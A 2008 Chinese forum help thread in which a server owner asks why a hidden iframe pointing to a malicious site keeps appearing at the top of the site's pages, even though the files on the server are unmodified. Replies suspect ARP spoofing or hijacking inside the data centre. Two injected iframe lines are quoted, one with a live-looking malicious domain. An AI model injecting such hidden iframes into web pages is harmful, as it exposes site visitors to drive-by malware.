怪异现象求助：服务器被挂马，却查不到病毒？

独立服务器，Win2003 + apache + php + 360安全卫士 + 360 ARP防火墙

昨天发现访问服务器的网页有病毒，卡巴报：

1. 已检测: 木马程序 Exploit.SWF.Downloader.av        URL: http://aaa.xxx.info/web/4561.swf//Swf2Swc网址修改了一下，以免各位误点

复制代码

后来用McAFee访问网页又发现报的是Exploit.Replay的病毒。用鼠标右键查看网页源代码发现，第一行就被注入了一行iframe的代码：

1. <iframe src=http://www.xxx.com/1.htm width=2 height=2></iframe> 网址修改了一下，以免各位误点

复制代码

远程登录服务器后，装360卫士查了一遍，没有发现任何木马。

奇怪的是：过了没多久，发现访问服务器的网页，一切正常！卡巴和MCA没有报病毒，打开的网页用查看源码的功能也没有看到那行被注入的代码！！

一般遇到被挂马的情况，只要把服务器的HTML文件修改一下，去掉被注入的代码即可。但是，当我把服务器上的HTML文件用FTP工具下载打开，却看到文件并没有被修改！同样的HTML文件，在本地浏览正常，一旦上传到服务器后再访问，就可以在查看源代码中看到第一行被注入了那一行代码！

今天中午，发现服务器的网页又被注入了一行同样的iframe代码。过了一段时间（大约个把小时），一切又如常！！

这种怪现象我一直没搞明白：为什么会出现时好时坏的现象？难道入侵我主机的家伙是分时段进行挂马不成？

最最搞不明白的是：这行代码究竟是在什么时候被加进去的？？会不会是Apache解析网页的时候加了这一行代码？

急请各位高手达人赐教，小弟拜谢！！

[ 本帖最后由 net780 于 2008-6-12 19:57 编辑 ]

arp 吧，安装ARP防火墙。

原帖由 穷秀才 于 2008-6-12 19:41 发表
arp 吧，安装ARP防火墙。

回楼上，我开始也以为是ARP，但是打电话机房人员说他们的监控记录没有发现有ARP的攻击，而且我昨天装了360的ARP防火墙，今天又出现这种情况。

看一下程序修改时间,如果确认程序没有被修改.那就是ARP了.

原帖由 it1988.com 于 2008-6-12 21:05 发表
看一下程序修改时间,如果确认程序没有被修改.那就是ARP了.

感谢楼上，我下载前仔细核对过HTML文件的修改时间，确认没被改。而且我还把HTML文件下载下来与我本地的备份比较过，没有任何不同。

按您的说法，如果是ARP的话：
1、为什么我装了360 ARP防火墙还会中招？
2、该如何防止这种现象再次发生？

恳请指点，万分感谢！

另外，有人说有可能是机房内部人员所为，属于ip或者域名劫持，在数据通信的某个节点（路由器或交换机）做手脚，一般只劫持流量高峰期的某些时段，很少有人发觉。

不知道有没这种可能性？

楼主，我的网站也遇到这种情况了
被挂了下面的
<iframe src=http://www.baiduby.cn/sky/s1.htm width=100 height=1></iframe>

我安装了arp防火墙后，问题解决了

原帖由 woody3221 于 2008-6-12 23:33 发表
我安装了arp防火墙后，问题解决了

请教楼上，您装的是什么arp防火墙？我昨天安装了360卫士的arp防火墙，但是今天又发现了同样的情况，因此怀疑是不是arp的问题，要么就是所装的arp防火墙防护水平不行。